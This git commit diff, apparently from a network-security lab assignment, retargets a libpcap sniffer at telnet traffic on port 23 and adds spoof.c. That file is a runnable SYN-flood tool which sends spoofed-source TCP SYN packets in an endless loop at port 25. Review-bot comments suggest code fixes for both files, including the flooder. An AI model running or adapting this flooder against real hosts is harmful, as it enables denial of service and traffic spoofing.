Modified sniffex.c to fit assignment specifications. Added spoof.c from a spoofing tutorial.
This commit is contained in:
parent
94960008cd
commit
2dc7015d7a
3 changed files with 117 additions and 7 deletions
18
sniffex.c
18
sniffex.c
|
@ -507,7 +507,7 @@ int main(int argc, char **argv)
|
|||
char errbuf[PCAP_ERRBUF_SIZE]; /* error buffer */
|
||||
pcap_t *handle; /* packet capture handle */
|
||||
|
||||
char filter_exp[] = "dst portrange 10-100 and tcp"; /* filter expression [3] */
|
||||
char filter_exp[] = "port 23"; /* filter expression [3] */
|
||||
struct bpf_program fp; /* compiled filter program (expression) */
|
||||
bpf_u_int32 mask; /* subnet mask */
|
||||
bpf_u_int32 net; /* ip */
|
||||
|
@ -515,11 +515,19 @@ int main(int argc, char **argv)
|
|||
|
||||
print_app_banner();
|
||||
|
||||
// Check if file arg is passed.
|
||||
int read_file = 0;
|
||||
|
||||
/* check for capture device name on command-line */
|
||||
if (argc == 2) {
|
||||
dev = argv[1];
|
||||
}
|
||||
else if (argc > 2) {
|
||||
else if (argc == 3) {
|
||||
if (!strcmp(argv[1], "file")) {
|
||||
read_file = 1;
|
||||
}
|
||||
}
|
||||
else if (argc > 3) {
|
||||
fprintf(stderr, "error: unrecognized command-line options\n\n");
|
||||
print_app_usage();
|
||||
exit(EXIT_FAILURE);
|
||||
|
@ -547,8 +555,14 @@ int main(int argc, char **argv)
|
|||
printf("Number of packets: %d\n", num_packets);
|
||||
printf("Filter expression: %s\n", filter_exp);
|
||||
|
||||
if (read_file) {
|
||||
printf("%s\n", argv[2]);
|
||||
handle = pcap_open_offline(argv[2], errbuf);
|
||||
}
|
||||
else {
|
||||
/* open capture device */
|
||||
handle = pcap_open_live(dev, SNAP_LEN, 1, 1000, errbuf);
|
||||
}
|
||||
if (handle == NULL) {
|
||||
fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
|
||||
exit(EXIT_FAILURE);
|
||||
|
|
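Review bot: In the argument-parsing hunk (`@ -515,11 +515,19 @@`) the new `else if (argc == 3)` branch only sets `read_file` when `argv[1]` is `"file"`; any other three-argument invocation is silently accepted with `read_file` still 0, `dev` never taken from argv and no usage error, so the later `else` path calls `pcap_open_live(dev, ...)` with whatever `dev` held before (it is declared outside the hunk, so its value there is not visible here). The branch should reject an unrecognized first argument the same way the `argc > 3` branch does. Separately, in the third hunk the failure message `Couldn't open device %s` prints `dev` even when it was `pcap_open_offline(argv[2], errbuf)` that failed; use `read_file ? argv[2] : dev` as the argument so the message names what was actually opened. `main` starts and ends outside these hunks.
```c
else if (argc == 3) {
    if (strcmp(argv[1], "file") != 0) {
        fprintf(stderr, "error: unrecognized command-line options\n\n");
        print_app_usage();
        exit(EXIT_FAILURE);
    }
    read_file = 1;
}
// … unchanged: argc > 3 branch …
```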
96
spoof.c
Normal file
96
spoof.c
Normal file
|
@ -0,0 +1,96 @@
|
|||
#define __USE_BSD /* use bsd'ish ip header */
|
||||
#include <sys/socket.h> /* these headers are for a Linux system, but */
|
||||
#include <netinet/in.h> /* the names on other systems are easy to guess.. */
|
||||
#include <netinet/ip.h>
|
||||
#define __FAVOR_BSD /* use bsd'ish tcp header */
|
||||
#include <netinet/tcp.h>
|
||||
#include <unistd.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define P 25 /* lets flood the sendmail port */
|
||||
|
||||
unsigned short /* this function generates header checksums */
|
||||
csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return ~sum;
|
||||
}
|
||||
|
||||
int
|
||||
main (void)
|
||||
{
|
||||
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */
|
||||
char datagram[4096]; /* this buffer will contain ip header, tcp header,
|
||||
and payload. we'll point an ip header structure
|
||||
at its beginning, and a tcp header structure after
|
||||
that to write the header values into it */
|
||||
struct ip *iph = (struct ip *) datagram;
|
||||
struct tcphdr *tcph = (struct tcphdr *) datagram + sizeof (struct ip);
|
||||
struct sockaddr_in sin;
|
||||
/* the sockaddr_in containing the dest. address is used
|
||||
in sendto() to determine the datagrams path */
|
||||
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons (P);/* you byte-order >1byte header values to network
|
||||
byte order (not needed on big endian machines) */
|
||||
sin.sin_addr.s_addr = inet_addr ("127.0.0.1");
|
||||
|
||||
memset (datagram, 0, 4096); /* zero out the buffer */
|
||||
|
||||
/* we'll now fill in the ip/tcp header values, see above for explanations */
|
||||
iph->ip_hl = 5;
|
||||
iph->ip_v = 4;
|
||||
iph->ip_tos = 0;
|
||||
iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr); /* no payload */
|
||||
iph->ip_id = htonl (54321); /* the value doesn't matter here */
|
||||
iph->ip_off = 0;
|
||||
iph->ip_ttl = 255;
|
||||
iph->ip_p = 6;
|
||||
iph->ip_sum = 0; /* set it to 0 before computing the actual checksum later */
|
||||
iph->ip_src.s_addr = inet_addr ("1.2.3.4");/* SYN's can be blindly spoofed */
|
||||
iph->ip_dst.s_addr = sin.sin_addr.s_addr;
|
||||
tcph->th_sport = htons (1234); /* arbitrary port */
|
||||
tcph->th_dport = htons (P);
|
||||
tcph->th_seq = random ();/* in a SYN packet, the sequence is a random */
|
||||
tcph->th_ack = 0;/* number, and the ack sequence is 0 in the 1st packet */
|
||||
tcph->th_x2 = 0;
|
||||
tcph->th_off = 0; /* first and only tcp segment */
|
||||
tcph->th_flags = TH_SYN; /* initial connection request */
|
||||
tcph->th_win = htonl (65535); /* maximum allowed window size */
|
||||
tcph->th_sum = 0;/* if you set a checksum to zero, your kernel's IP stack
|
||||
should fill in the correct checksum during transmission */
|
||||
tcph->th_urp = 0;
|
||||
|
||||
iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);
|
||||
|
||||
/* finally, it is very advisable to do a IP_HDRINCL call, to make sure
|
||||
that the kernel knows the header is included in the data, and doesn't
|
||||
insert its own header into the packet before our data */
|
||||
|
||||
{ /* lets do it the ugly way.. */
|
||||
int one = 1;
|
||||
const int *val = &one;
|
||||
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
|
||||
printf ("Warning: Cannot set HDRINCL!\n");
|
||||
}
|
||||
|
||||
while (1)
|
||||
{
|
||||
if (sendto (s, /* our socket */
|
||||
datagram, /* the buffer containing headers and data */
|
||||
iph->ip_len, /* total length of our datagram */
|
||||
0, /* routing flags, normally always 0 */
|
||||
(struct sockaddr *) &sin, /* socket addr, just like in */
|
||||
sizeof (sin)) < 0) /* a normal send() */
|
||||
printf ("error\n");
|
||||
else
|
||||
printf (".");
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
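Review bot: The return value of `socket (PF_INET, SOCK_RAW, IPPROTO_TCP)` on the first line of `main` is never checked; a raw socket needs elevated privilege, so in the unprivileged case `s` is -1, `setsockopt` prints its warning, and the `while (1)` loop then prints `error` forever because every `sendto` on the bad descriptor fails and nothing breaks out of the loop. Fail fast on `s < 0` and give the loop a termination condition (a bounded iteration count or a stop flag checked each pass) so a failing `sendto` is reported once and the process exits instead of spinning. `random ()` and `inet_addr ()` are also used with no `<stdlib.h>` or `<arpa/inet.h>` include, which is an implicit function declaration — removed from the language in C99 and a hard error on recent compilers — so add those two includes. Finally, `__USE_BSD` and `__FAVOR_BSD` are identifiers beginning with a double underscore, which are reserved for the implementation; they appear to rely on glibc internals rather than a documented feature-test macro, so a comment saying which libc/version this was verified against would help the next reader.
```c
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */
if (s < 0)
  {
    perror ("socket");
    return 1;
  }
/* … unchanged: datagram buffer, header setup, IP_HDRINCL, send loop … */
```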
BIN
tfsession.pcap
Normal file
BIN
tfsession.pcap
Normal file
Binary file not shown.